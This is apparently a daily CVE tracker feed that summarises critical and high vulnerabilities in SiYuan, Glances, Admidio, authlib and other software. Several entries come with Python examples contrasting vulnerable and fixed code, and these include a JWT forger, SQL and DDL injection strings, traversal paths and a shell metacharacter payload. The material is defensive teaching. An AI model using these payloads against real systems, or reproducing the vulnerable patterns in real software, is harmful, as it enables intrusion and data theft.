238 CVEs tracked today. 18 Critical, 78 High, 112 Medium, 26 Low.
-
CVE-2026-32767
CRITICAL
CVSS 9.8
An authorization bypass vulnerability in SiYuan Note v3.6.0 and earlier allows any authenticated user, including those with read-only 'Reader' role privileges, to execute arbitrary SQL commands through the /api/search/fullTextSearchBlock endpoint when the method parameter is set to 2. This enables attackers to read, modify, or delete all data in the application's SQLite database, completely bypassing the application's role-based access controls. A detailed proof-of-concept demonstrates how Reader-role users can execute destructive SQL operations including dropping tables.
SQLi
Docker
-
CVE-2026-32760
CRITICAL
CVSS 9.8
Unauthenticated attackers can register administrator accounts when self-registration is enabled and the default user permissions include admin privileges, because the signup handler fails to strip admin permissions from self-registered accounts. Public exploit code exists for this vulnerability. No patch is currently available.
Privilege Escalation
Docker
-
CVE-2026-32751
CRITICAL
CVSS 9.0
SiYuan's mobile file tree fails to sanitize notebook names in WebSocket rename events, allowing authenticated users to inject arbitrary HTML and JavaScript that executes in other clients' browsers. When combined with Electron's insecure configuration (nodeIntegration enabled, contextIsolation disabled), this stored XSS escalates to remote code execution with full Node.js privileges on affected desktop and mobile clients. The vulnerability affects users with notebook rename permissions across Docker, Node.js, Python, and Apple platforms.
Docker
RCE
XSS
Node.js
Command Injection
-
CVE-2026-32737
CRITICAL
CVSS 10.0
CVE-2026-32737 is a security vulnerability (CVSS 10.0). Critical severity with potential for significant impact on affected systems. Vendor patch is available.
Authentication Bypass
-
CVE-2026-32633
CRITICAL
CVSS 9.1
The Glances system monitoring tool exposes reusable authentication credentials for downstream servers through an unauthenticated API endpoint when running in Central Browser mode without password protection. This vulnerability allows any network attacker to retrieve pbkdf2-hashed passwords that can be replayed to access protected Glances servers across an entire monitored fleet. A proof-of-concept is included in the advisory demonstrating credential extraction from the /api/4/serverslist endpoint.
Python
Information Disclosure
-
CVE-2026-32267
CRITICAL
CVSS 9.8
A security vulnerability in Craft CMS (CVSS 9.8). Critical severity with potential for significant impact on affected systems.
Authentication Bypass
Cms
-
CVE-2026-28430
CRITICAL
CVSS 9.8
Unauthenticated SQL injection in Chamilo LMS versions prior to 1.11.34 enables remote attackers to execute arbitrary database queries through the custom_dates parameter and escalate to full administrative account takeover by exploiting a predictable password reset mechanism. This critical vulnerability exposes the entire database including personally identifiable information and system configurations without requiring any credentials or user interaction. No patch is currently available for affected installations.
SQLi
Chamilo Lms
-
CVE-2026-27962
CRITICAL
CVSS 9.1
A critical authentication bypass vulnerability in authlib's JWT signature verification allows attackers to forge arbitrary tokens by injecting their own cryptographic keys through the JWT header. The flaw affects all versions of authlib prior to 1.6.9 when applications use key resolution callbacks that can return None (common in JWKS-based authentication flows). A working proof-of-concept exists demonstrating complete authentication bypass, enabling attackers to impersonate any user or assume administrative privileges without valid credentials.
Docker
Python
Deserialization
Jwt Attack
Redhat
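The key-resolution fallback described above, as an added illustration that is not authlib's code: a toy HS256 verifier whose key-resolver callback returns None for an unknown `kid`. The vulnerable path then trusts a symmetric key the attacker embedded in the token's own header (a `jwk` header of type `oct`, an assumption about the shape of the flaw made for this example), while the fixed path refuses to verify at all without a trusted key. All key material and claims are constructed.

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side key material; the attacker never learns it.
SERVER_KEYS = {"srv-1": b"server-secret-constructed-for-demo"}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, claims: dict, key: bytes) -> str:
    """Build header.claims.signature with HMAC-SHA256 (toy JWT, not a library)."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def _check_signature(token: str, key: bytes) -> dict:
    head_b64, claims_b64, sig_b64 = token.split(".")
    expected = hmac.new(key, f"{head_b64}.{claims_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(claims_b64))


def resolve_by_kid(header: dict):
    """Key-resolution callback of the kind the entry describes: None when the kid is unknown."""
    return SERVER_KEYS.get(header.get("kid"))


def decode_vulnerable(token: str, resolve_key) -> dict:
    header = json.loads(b64url_decode(token.split(".")[0]))
    key = resolve_key(header)
    if key is None:
        # Fail-open fallback (assumed shape of the flaw): trust a symmetric key
        # carried in the token's own header, which the attacker controls.
        key = b64url_decode(header["jwk"]["k"])
    return _check_signature(token, key)


def decode_fixed(token: str, resolve_key) -> dict:
    header = json.loads(b64url_decode(token.split(".")[0]))
    key = resolve_key(header)
    if key is None:
        raise ValueError(f"no trusted key for kid={header.get('kid')!r}")
    return _check_signature(token, key)


def forge_admin_token() -> str:
    """Attacker signs with a key of their choosing and ships it in the header."""
    attacker_key = b"attacker-chosen-key"
    header = {
        "alg": "HS256",
        "kid": "no-such-kid",
        "jwk": {"kty": "oct", "k": b64url_encode(attacker_key)},
    }
    return sign_hs256(header, {"sub": "admin", "role": "admin"}, attacker_key)


def demo():
    token = forge_admin_token()
    accepted_as = decode_vulnerable(token, resolve_by_kid)["sub"]
    try:
        decode_fixed(token, resolve_by_kid)
        rejected = False
    except ValueError:
        rejected = True
    return accepted_as, rejected
```

The check to add when auditing a JWKS-based resolver is the same as in `decode_fixed`: a resolver that returns None must abort verification, and nothing carried inside the token (`jwk`, `jku`, `x5u`, `kid`) may ever be used to select key material that the server did not already trust.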
-
CVE-2026-25534
CRITICAL
CVSS 9.1
Java URL parsing in Spinnaker's clouddriver and Orca components fails to properly validate URLs containing underscores, allowing authenticated attackers to bypass URL sanitization controls and potentially execute arbitrary code or access unauthorized resources. This vulnerability affects both the clouddriver artifact handling and Orca fromUrl expression evaluation in versions prior to 2025.2.4, 2025.3.1, 2025.4.1, and 2026.0.0. Patched versions are available, and affected deployments can temporarily disable the vulnerable components as a workaround.
SSRF
Java
-
CVE-2026-23489
CRITICAL
CVSS 9.1
A critical remote code execution vulnerability exists in the Fields plugin for GLPI that allows authenticated users with dropdown creation privileges to execute arbitrary PHP code on the server. The vulnerability affects Fields plugin versions prior to 1.23.3 and has a CVSS score of 9.1, indicating severe impact with the ability to compromise the entire system. While no active exploitation has been reported in KEV and no public proof-of-concept is mentioned, the straightforward attack vector and the high-privilege requirement point to targeted insider-threat or compromised-account scenarios.
PHP
RCE
Fields
-
CVE-2026-4254
CRITICAL
CVSS 9.8
Remote code execution in Tenda AC8 firmware versions up to 16.03.50.11 results from a stack-based buffer overflow in the HTTP endpoint handling password change requests. An unauthenticated attacker can exploit this vulnerability over the network to execute arbitrary commands with full system privileges. Public exploit code exists for this vulnerability and no patch is currently available.
Buffer Overflow
Tenda
-
CVE-2026-4177
CRITICAL
CVSS 9.1
A critical heap buffer overflow vulnerability exists in YAML::Syck through version 1.36 for Perl, allowing remote attackers to potentially execute arbitrary code or cause denial of service without authentication. The vulnerability stems from multiple memory corruption issues including heap overflow when processing YAML class names exceeding 512 bytes, buffer overread in base64 decoding, and memory leaks. With a CVSS score of 9.1 and network-based attack vector requiring no user interaction, this presents a severe risk to applications parsing untrusted YAML input.
Heap Overflow
Buffer Overflow
-
CVE-2025-69902
CRITICAL
CVSS 9.8
A command injection vulnerability in the minimal_wrapper.py component of kubectl-mcp-server v1.2.0 allows attackers to execute arbitrary commands via injecting arbitrary shell metacharacters.
Command Injection
RCE
Code Injection
-
CVE-2025-69809
CRITICAL
CVSS 9.8
A critical write-what-where memory corruption vulnerability exists in p2r3 Bareiron (commit 8e4d40) that allows unauthenticated remote attackers to write arbitrary values to memory locations, enabling arbitrary code execution through specially crafted network packets. The vulnerability carries a CVSS score of 9.8 and is remotely exploitable without authentication, though it is not currently listed in CISA KEV and has no EPSS score data available. A proof-of-concept appears to exist based on the GitHub reference to a dedicated CVE repository.
RCE
-
CVE-2025-69808
CRITICAL
CVSS 9.1
An out-of-bounds memory access (OOB) in p2r3 Bareiron commit 8e4d40 allows unauthenticated attackers to access sensitive information and cause a Denial of Service (DoS) via supplying a crafted packet.
Denial Of Service
Information Disclosure
Buffer Overflow
-
CVE-2025-62319
CRITICAL
CVSS 9.8
A Boolean-based SQL injection vulnerability exists in HCL Unica that allows remote attackers to manipulate backend database queries through specially crafted input fields. The vulnerability affects HCL Unica version 25.1.1 and below, enabling unauthenticated attackers to extract sensitive data, modify database contents, or potentially compromise the entire system. With a critical CVSS score of 9.8 and network-based attack vector requiring no authentication, this represents a severe risk to organizations using affected Unica installations.
SQLi
Unica
-
CVE-2017-20224
CRITICAL
CVSS 9.8
An unauthenticated arbitrary file upload vulnerability in Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 allows remote attackers to upload malicious files and execute code through improperly enabled WebDAV HTTP methods. Attackers can achieve remote code execution or denial of service without any authentication, making this a critical risk for exposed devices. Multiple proof-of-concept exploits are publicly available through security research publications.
RCE
Denial Of Service
File Upload
Sdt Cs3b1
-
CVE-2017-20223
CRITICAL
CVSS 9.8
An insecure direct object reference vulnerability in Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0 allows remote attackers to bypass authentication and directly access sensitive resources by manipulating input parameters. With a publicly available proof-of-concept exploit and a critical CVSS score of 9.8, attackers can gain unauthorized access to sensitive information and system functionalities without any authentication or user interaction required.
Authentication Bypass
Sdt Cs3b1
-
CVE-2026-32813
HIGH
CVSS 8.0
A second-order SQL injection vulnerability exists in Admidio's MyList configuration feature, allowing authenticated users to inject arbitrary SQL commands through list column configurations that are safely stored but unsafely read back. The vulnerability enables attackers to read sensitive data including password hashes, modify database contents, or achieve full database compromise. A detailed proof-of-concept is available demonstrating exploitation requiring only standard user privileges.
CSRF
SQLi
PHP
Privilege Escalation
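The second-order pattern, as an added sqlite3 illustration rather than Admidio's code: the column configuration is written with a parameterized INSERT (first order, safe), then read back and concatenated into the SELECT that renders the list (second order, unsafe). The schema, the member row and the attacker payload are constructed for the example.

```python
import sqlite3

# Constructed allowlist of columns a list may display.
ALLOWED_COLUMNS = {"first_name", "last_name", "email"}


def setup_db() -> sqlite3.Connection:
    """Constructed schema: a members table holding secrets, plus the per-list column config."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE members (id INTEGER, first_name TEXT, last_name TEXT, email TEXT, password_hash TEXT);
        INSERT INTO members VALUES (1, 'Alice', 'Example', 'alice@example.org', '$2y$10$constructed-hash');
        CREATE TABLE list_columns (list_id INTEGER, position INTEGER, column_name TEXT);
    """)
    return con


def save_list_column(con, list_id: int, position: int, column_name: str) -> None:
    # First order: the write is parameterized, so nothing looks wrong at this point.
    con.execute("INSERT INTO list_columns VALUES (?, ?, ?)", (list_id, position, column_name))


def _stored_columns(con, list_id: int) -> list:
    rows = con.execute(
        "SELECT column_name FROM list_columns WHERE list_id = ? ORDER BY position", (list_id,)
    )
    return [r[0] for r in rows]


def render_list_vulnerable(con, list_id: int) -> list:
    # Second order: stored names are treated as trusted SQL and concatenated into the SELECT.
    select_list = ", ".join(_stored_columns(con, list_id))
    return con.execute(f"SELECT {select_list} FROM members").fetchall()


def render_list_fixed(con, list_id: int) -> list:
    # Data coming back from the database is still input: allowlist it before building SQL.
    cols = _stored_columns(con, list_id)
    bad = [c for c in cols if c not in ALLOWED_COLUMNS]
    if bad:
        raise ValueError(f"rejected stored column(s): {bad}")
    select_list = ", ".join(f'"{c}"' for c in cols)
    return con.execute(f"SELECT {select_list} FROM members").fetchall()


def demo():
    con = setup_db()
    save_list_column(con, 7, 1, "first_name")
    # Constructed attacker payload, saved through the normal list editor with standard privileges.
    save_list_column(con, 7, 2, "(SELECT group_concat(password_hash) FROM members)")
    leaked = render_list_vulnerable(con, 7)
    try:
        render_list_fixed(con, 7)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked
```

The practitioner's check is to grep for every place a stored configuration value is spliced into SQL, not only the request handlers: second-order injection survives input validation at write time precisely because the read path assumes the database only ever contains what the application itself put there.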
-
CVE-2026-32805
HIGH
CVSS 7.5
Path traversal in the webserver's archive extraction function allows unauthenticated remote attackers to write files outside the intended directory by crafting malicious tar archives, due to incomplete path validation in the sanitizeArchivePath function. The vulnerability affects the download command's decompression functionality and could enable arbitrary file placement on the system. A patch is available.
Path Traversal
-
CVE-2026-32775
HIGH
CVSS 7.4
An integer underflow vulnerability in libexif versions up to 0.6.25 allows attackers to cause buffer overflows when processing malformed EXIF MakerNotes data in image files. This can lead to arbitrary code execution or information disclosure when a victim opens a maliciously crafted image containing specially crafted EXIF metadata. While not currently listed in CISA KEV or showing high EPSS scores, the vulnerability has a published fix and affects a widely used image metadata processing library.
Information Disclosure
Integer Overflow
Libexif
-
CVE-2026-32771
HIGH
Path traversal in the `extractor` CLI tool and `extract.DumpOTelCollector` library function allows attackers to write files outside the intended extraction directory by exploiting an incomplete path validation check in the `sanitizeArchivePath` function. A maliciously crafted tar archive can bypass the prefix check and place arbitrary files on the system when processed. A patch is available to address the missing trailing path separator validation.
Path Traversal
-
CVE-2026-32769
HIGH
CVE-2026-32769 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.
Kubernetes
Authentication Bypass
-
CVE-2026-32768
HIGH
CVSS 7.9
CVE-2026-32768 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.
Kubernetes
Authentication Bypass
-
CVE-2026-32759
HIGH
CVSS 8.1
The TUS resumable upload handler allows authenticated users to trigger arbitrary `after_upload` hooks an unlimited number of times by supplying a negative value in the Upload-Length header, causing command execution with zero bytes actually uploaded. The flaw in the completion logic (classified as CWE-190, integer overflow or wraparound) bypasses the file upload requirement and enables privilege escalation through hook execution. No patch is currently available.
Integer Overflow
Command Injection
Denial Of Service
Docker
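A stylized model of the completion check described above, added here as an illustration and not the handler's own code: with a negative declared length, `offset >= length` is already true after an empty PATCH, so the hook runs on every request and nothing marks the upload as finished. The fixed parser accepts only an unsigned decimal within a ceiling, and the fixed upload completes exactly once when the declared byte count has arrived. The ceiling and the hook are assumptions.

```python
MAX_UPLOAD_BYTES = 4 * 1024 ** 3  # example ceiling, an assumption


def parse_upload_length_vulnerable(header_value: str) -> int:
    # int() happily accepts "-1", so a negative declared length reaches the completion check.
    return int(header_value)


def parse_upload_length_fixed(header_value: str) -> int:
    # TUS Upload-Length is a non-negative decimal integer; reject signs, whitespace and empties.
    if not header_value.isdigit():
        raise ValueError(f"invalid Upload-Length: {header_value!r}")
    length = int(header_value)
    if length == 0 or length > MAX_UPLOAD_BYTES:
        raise ValueError(f"Upload-Length out of range: {length}")
    return length


class Upload:
    """Stylized resumable upload: PATCH appends a chunk, completion runs after_upload."""

    def __init__(self, length: int, after_upload):
        self.length = length
        self.offset = 0
        self.after_upload = after_upload
        self.hook_runs = 0

    def patch(self, chunk: bytes) -> int:
        self.offset += len(chunk)
        # Vulnerable completion logic: with length < 0 this is true after every PATCH,
        # even an empty one, and nothing stops the hook from running again.
        if self.offset >= self.length:
            self.hook_runs += 1
            self.after_upload(self)
        return self.offset


class SafeUpload(Upload):
    def __init__(self, length: int, after_upload):
        super().__init__(length, after_upload)
        self.completed = False

    def patch(self, chunk: bytes) -> int:
        if self.completed:
            raise ValueError("upload already completed")
        if self.offset + len(chunk) > self.length:
            raise ValueError("chunk exceeds declared Upload-Length")
        self.offset += len(chunk)
        # Complete exactly once, and only when every declared byte has arrived.
        if self.offset == self.length:
            self.completed = True
            self.hook_runs += 1
            self.after_upload(self)
        return self.offset


def demo():
    hook_log = []
    bad = Upload(parse_upload_length_vulnerable("-1"), lambda u: hook_log.append(u.offset))
    for _ in range(3):
        bad.patch(b"")  # zero bytes uploaded, hook fires each time
    try:
        parse_upload_length_fixed("-1")
        rejected = False
    except ValueError:
        rejected = True
    good = SafeUpload(parse_upload_length_fixed("4"), lambda u: hook_log.append(u.offset))
    good.patch(b"ab")
    good.patch(b"cd")
    return bad.hook_runs, rejected, good.hook_runs, hook_log
```

Two defences are needed, not one: input validation on the header stops the negative value, and the one-shot `completed` flag stops the hook from re-firing even if some other path produces an offset at or past the length.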
-
CVE-2026-32756
HIGH
CVSS 8.8
An unrestricted file upload vulnerability in Admidio's Documents & Files module allows authenticated users with upload permissions to bypass file extension restrictions by submitting an invalid CSRF token, enabling upload of PHP scripts that lead to Remote Code Execution. The vulnerability affects Admidio versions prior to the patch and has a published proof-of-concept demonstrating webshell upload and command execution. With a CVSS score of 8.8 and detailed exploitation steps available, this represents a high-priority risk for organizations using Admidio for document management.
CSRF
PHP
RCE
Information Disclosure
File Upload
-
CVE-2026-32749
HIGH
CVSS 7.6
Path traversal in the POST /api/import/importSY and POST /api/import/importZipMd import endpoints allows authenticated administrators to write files to arbitrary filesystem locations by injecting directory traversal sequences into multipart upload filenames, potentially enabling remote code execution by placing malicious files in executable paths. The endpoints fail to sanitize user-supplied filenames before constructing file write paths. No patch is currently available.
Python
Docker
Path Traversal
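One check that covers the three path traversal entries above (CVE-2026-32805 and CVE-2026-32771, where the `sanitizeArchivePath` prefix check lacked a trailing separator, and CVE-2026-32749, where traversal sequences in multipart filenames reached the write path), added here as a Python illustration and not code from any of those projects. The prefix-without-separator flaw is modeled from the entries' description of the fix (an assumption about the original Go code); the sample member names are constructed.

```python
import posixpath


def within_vulnerable(dest: str, target: str) -> bool:
    # Prefix check with no trailing separator: "/srv/out" also "contains" "/srv/out_evil/x".
    return target.startswith(dest)


def within_fixed(dest: str, target: str) -> bool:
    # Compare against the directory *plus* a separator, and allow the directory itself.
    dest = dest.rstrip("/") or "/"
    return target == dest or target.startswith(dest + "/")


def resolve(dest: str, name: str) -> str:
    # normpath collapses "..": "../../etc/passwd" under /srv/out becomes "/etc/passwd".
    # join discards dest for an absolute name, so "/etc/passwd" resolves as-is and is then rejected.
    return posixpath.normpath(posixpath.join(dest, name))


def check_member(dest: str, name: str) -> tuple:
    """(vulnerable verdict, fixed verdict) for one archive member or upload filename."""
    target = resolve(dest, name)
    return within_vulnerable(dest, target), within_fixed(dest, target)


def safe_target(dest: str, name: str) -> str:
    """Path to write to, or ValueError if the name escapes dest."""
    target = resolve(dest, name)
    if not within_fixed(dest, target):
        raise ValueError(f"refusing to write outside {dest}: {name!r} -> {target}")
    return target


# Constructed inputs: archive member names and multipart filenames as an attacker could supply them.
SAMPLES = [
    "notes/a.md",                 # benign
    "../../etc/cron.d/job",       # classic traversal: both checks catch it
    "../out_evil/shell.php",      # sibling directory: passes the prefix check, fails the fixed one
    "/etc/passwd",                # absolute member name
]


def classify(dest: str = "/srv/out") -> dict:
    return {name: check_member(dest, name) for name in SAMPLES}
```

When extracting real archives, apply `safe_target` to every member before creating it, and treat symlink and hardlink members separately: a link whose target escapes `dest` defeats this check even though the link's own path passes it. `os.path.commonpath([dest, target]) == dest` is an equivalent formulation of `within_fixed` for the platform's native separator.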
-
CVE-2026-32728
HIGH
A file upload validation bypass via MIME parameter injection allows authenticated attackers to upload malicious files by appending parameters such as `;charset=utf-8` to the Content-Type header, which defeats extension filters and default blocklists that compare the full header value. This enables stored XSS attacks that can compromise session tokens, credentials, and sensitive browser data accessible to the application's domain. A patch is available that strips MIME parameters during validation and expands the default blocklist.
Information Disclosure
XSS
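The whole-header comparison and its fix, as an added example that is not the affected project's code: the vulnerable check tests the raw Content-Type against a blocklist, so `text/html;charset=utf-8` is "not blocked"; the fixed check first reduces the header to its type/subtype. The blocklists are constructed, and the assumption that the stored type is echoed back on download (which is what turns the bypass into stored XSS) is stated in the code.

```python
import posixpath

# Constructed default blocklists of the kind the entry describes.
BLOCKED_EXTENSIONS = {".html", ".htm", ".xhtml", ".svg", ".xml", ".php"}
BLOCKED_MEDIA_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml", "text/xml", "application/xml"}


def media_type(content_type: str) -> str:
    # RFC 2045 header shape is type "/" subtype *( ";" parameter ); only type/subtype is compared.
    return content_type.split(";", 1)[0].strip().lower()


def is_blocked_type_vulnerable(content_type: str) -> bool:
    # Whole-header comparison: "text/html;charset=utf-8" is not in the set, so it slips through.
    return content_type.strip().lower() in BLOCKED_MEDIA_TYPES


def is_blocked_type_fixed(content_type: str) -> bool:
    return media_type(content_type) in BLOCKED_MEDIA_TYPES


def accept_upload(filename: str, content_type: str, *, fixed: bool):
    """Return the Content-Type the file will later be served with, or None if rejected.

    Assumption for this illustration: the application stores the declared type and
    echoes it back on download, which is what makes a blocked type into stored XSS.
    """
    if posixpath.splitext(filename)[1].lower() in BLOCKED_EXTENSIONS:
        return None
    blocked = is_blocked_type_fixed(content_type) if fixed else is_blocked_type_vulnerable(content_type)
    if blocked:
        return None
    # The fixed path also stores the normalized media type rather than the raw header.
    return media_type(content_type) if fixed else content_type
```

Parameter stripping is necessary but not sufficient: a server that trusts any client-declared type is one new browser-renderable type away from the same bug, so serving uploads with `Content-Disposition: attachment`, `X-Content-Type-Options: nosniff` and from a separate origin is the complementary control.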
-
CVE-2026-32634
HIGH
CVSS 8.1
A credential disclosure vulnerability exists in Glances monitoring tool when running in Central Browser mode with autodiscovery enabled. The vulnerability allows attackers on the same local network to steal reusable authentication credentials by advertising fake Glances services via Zeroconf, as the application trusts untrusted service names for password lookups instead of using verified IP addresses. A working proof-of-concept is included in the advisory, and the issue has a CVSS score of 8.1 indicating high severity.
Python
Information Disclosure
-
CVE-2026-32611
HIGH
CVSS 7.0
SQL injection in the Glances DuckDB export module (Python) allows unauthenticated remote attackers to execute arbitrary SQL by injecting malicious data through unparameterized table and column name interpolation in DDL statements. While INSERT values use parameterized queries, identifier names are embedded directly via f-strings, enabling attackers on the network to manipulate the database structure and access sensitive monitoring data. A patch is available.
Python
SQLi
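Identifier injection is the case parameter binding cannot solve, because placeholders bind values, not table or column names. The following is an added sqlite3 illustration of the pattern the entry describes, not the Glances export code: the vulnerable DDL splices a field name into `CREATE TABLE` with an f-string; the fix validates each identifier against a strict pattern and quotes it. `executescript` stands in for a driver that runs stacked statements (an assumption about the real module), and the payload field name is constructed.

```python
import re
import sqlite3

# Unquoted SQL identifier: letters, digits, underscore; bounded length.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,62}$")


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (name TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('root', '$6$constructed');
    """)
    return con


def table_exists(con, name: str) -> bool:
    row = con.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def ensure_table_vulnerable(con, table: str, columns: list) -> None:
    # Identifiers spliced in with an f-string; only the later INSERT values would be parameterized.
    # executescript stands in for a driver that runs stacked statements (assumption, see lead-in).
    col_ddl = ", ".join(f"{c} DOUBLE" for c in columns)
    con.executescript(f"CREATE TABLE IF NOT EXISTS {table} ({col_ddl})")


def quote_ident(name: str) -> str:
    # Validate against a strict pattern, then quote so even a reserved word is safe.
    if not IDENT_RE.match(name):
        raise ValueError(f"rejected identifier: {name!r}")
    return '"' + name + '"'


def ensure_table_fixed(con, table: str, columns: list) -> None:
    col_ddl = ", ".join(f"{quote_ident(c)} DOUBLE" for c in columns)
    con.execute(f"CREATE TABLE IF NOT EXISTS {quote_ident(table)} ({col_ddl})")


# Constructed: a field name under attacker influence (the entry says such names reach the DDL).
PAYLOAD_COLUMN = "cpu_percent DOUBLE); DROP TABLE users; --"


def demo():
    con = setup_db()
    ensure_table_vulnerable(con, "stats", ["mem_percent", PAYLOAD_COLUMN])
    dropped = not table_exists(con, "users")

    con2 = setup_db()
    try:
        ensure_table_fixed(con2, "stats", ["mem_percent", PAYLOAD_COLUMN])
        rejected = False
    except ValueError:
        rejected = True
    ensure_table_fixed(con2, "stats", ["mem_percent", "cpu_percent"])
    return dropped, rejected, table_exists(con2, "users"), table_exists(con2, "stats")
```

The allowlist regex is the real control; the quoting only guards against reserved words. Identifiers that legitimately need characters outside the pattern (hyphens in container names, for example) should be mapped through a fixed translation table rather than having the pattern loosened.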
-
CVE-2026-32610
HIGH
CVSS 8.1
A CORS misconfiguration in the Glances system monitoring tool's REST API allows any website to steal sensitive system information from users who visit a malicious page while having access to a Glances instance. The vulnerability affects all versions prior to 4.5.2 and enables cross-origin theft of system stats, configuration secrets, database passwords, API keys, and command-line arguments. A proof-of-concept is publicly available, though no active exploitation has been reported yet.
Python
Information Disclosure
Docker
Cors Misconfiguration
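The entry does not say which CORS misconfiguration Glances had, so the following added example (not Glances code) models the two shapes that let "any website" read an API: reflecting the request Origin together with `Access-Control-Allow-Credentials: true`, and a wildcard `Access-Control-Allow-Origin: *` on an API that needs no credentials at all. `browser_can_read` is a simplified version of the check a browser applies to a response; the allowlisted origin is constructed.

```python
# Constructed: the only origin that should be allowed to read the API from a browser page.
ALLOWED_ORIGINS = {"https://ops.example.internal"}


def cors_headers_vulnerable(request_origin):
    # Reflect whatever Origin arrived, and allow credentials: any page can read authenticated responses.
    if request_origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers_fixed(request_origin):
    # Allowlist, never reflect; Vary: Origin so caches do not serve one origin's answer to another.
    if request_origin in ALLOWED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",
        }
    return {}


def browser_can_read(response_headers, page_origin, with_credentials):
    """Simplified CORS response check as a browser applies it (assumption: only ACAO/ACAC modeled)."""
    acao = response_headers.get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials  # a wildcard is never accepted for credentialed requests
    if acao != page_origin:
        return False
    return not with_credentials or response_headers.get("Access-Control-Allow-Credentials") == "true"


ATTACKER = "https://attacker.example"


def demo():
    stolen_vulnerable = browser_can_read(cors_headers_vulnerable(ATTACKER), ATTACKER, with_credentials=True)
    stolen_fixed = browser_can_read(cors_headers_fixed(ATTACKER), ATTACKER, with_credentials=True)
    # Unauthenticated API with a wildcard: no credentials are needed, so "*" alone is enough to read it.
    wildcard_unauth = browser_can_read({"Access-Control-Allow-Origin": "*"}, ATTACKER, with_credentials=False)
    legit = browser_can_read(
        cors_headers_fixed("https://ops.example.internal"), "https://ops.example.internal", True
    )
    return stolen_vulnerable, stolen_fixed, wildcard_unauth, legit
```

The second shape matters for monitoring tools specifically: an API that is unauthenticated by default and answers with `*` is readable by any page the operator visits, without a single reflected header, so CORS hardening and enabling authentication go together.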
-
CVE-2026-32609
HIGH
CVSS 7.5
An information disclosure vulnerability in the Glances system monitoring tool allows unauthenticated remote attackers to access sensitive configuration data including password hashes, SNMP community strings, and authentication keys through unprotected API endpoints. It affects Glances versions prior to 4.5.2 when running in web server mode without password protection (the default configuration), and a proof-of-concept demonstrating the attack is publicly available. While not currently in CISA's Known Exploited Vulnerabilities catalog, the issue carries a CVSS score of 7.5 because of the ease of exploitation and the sensitivity of the exposed secrets.
Python
Information Disclosure
-
CVE-2026-32608
HIGH
CVSS 7.0
Glances monitoring system allows local attackers with limited privileges to execute arbitrary commands by injecting shell metacharacters into process or container names, which bypass command sanitization in the action execution handler. The vulnerability affects the threshold alert system that dynamically executes administrator-configured shell commands populated with runtime monitoring data. An attacker controlling a process name or container name can manipulate command parsing to break out of intended command boundaries and inject malicious commands.
Privilege Escalation
Nginx
Python
Command Injection
Docker
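Both CVE-2025-69902 (the kubectl-mcp-server `minimal_wrapper.py`) and CVE-2026-32608 (Glances alert actions) are the same defect: runtime data is spliced into a command string and the string is handed to a shell. The following added example (not code from either project) shows the vulnerable form and two fixes: splitting the trusted template into argv before substituting, and, where a shell is unavoidable, quoting every substituted value. `echo` stands in for `kubectl` or the administrator's alert command so the block runs anywhere with `/bin/sh`; the template and the process name are constructed.

```python
import shlex
import subprocess

# "echo" stands in for kubectl / an administrator's alert command so the example runs anywhere.
TEMPLATE = "echo alert: {name}"
# Constructed process name under attacker control.
ATTACKER_NAME = "nginx; echo INJECTED"


def run_vulnerable(template: str, **values) -> str:
    # Runtime data is spliced into the string, then the string is handed to /bin/sh.
    cmd = template.format(**values)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_fixed_argv(template: str, **values) -> str:
    # Split the trusted template first, substitute afterwards: a value can only ever be one argument.
    argv = [token.format(**values) for token in shlex.split(template)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def run_fixed_quoted(template: str, **values) -> str:
    # When a shell is unavoidable (pipes, redirects in the admin template), quote every substituted value.
    quoted = {k: shlex.quote(str(v)) for k, v in values.items()}
    return subprocess.run(template.format(**quoted), shell=True, capture_output=True, text=True).stdout


def demo() -> dict:
    return {
        "vulnerable": run_vulnerable(TEMPLATE, name=ATTACKER_NAME),
        "argv": run_fixed_argv(TEMPLATE, name=ATTACKER_NAME),
        "quoted": run_fixed_quoted(TEMPLATE, name=ATTACKER_NAME),
    }
```

For a wrapper that takes a whole command line from a client, as an MCP tool does, the argv form should additionally be paired with an allowlist of permitted subcommands, since `["kubectl", "exec", ...]` is still arbitrary execution even with the shell out of the picture.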
-
CVE-2026-32606
HIGH
CVSS 7.6
A physical-access vulnerability in IncusOS allows attackers to bypass LUKS disk encryption without breaking Secure Boot or modifying the kernel. The vulnerability affects all IncusOS versions through mkosi prior to version 202603142010 and enables an attacker with physical access to extract encryption keys by substituting the encrypted root partition with a malicious partition of their own. A fix has been released and the attack methodology has been publicly documented.
Information Disclosure
-
CVE-2026-32596
HIGH
CVSS 7.5
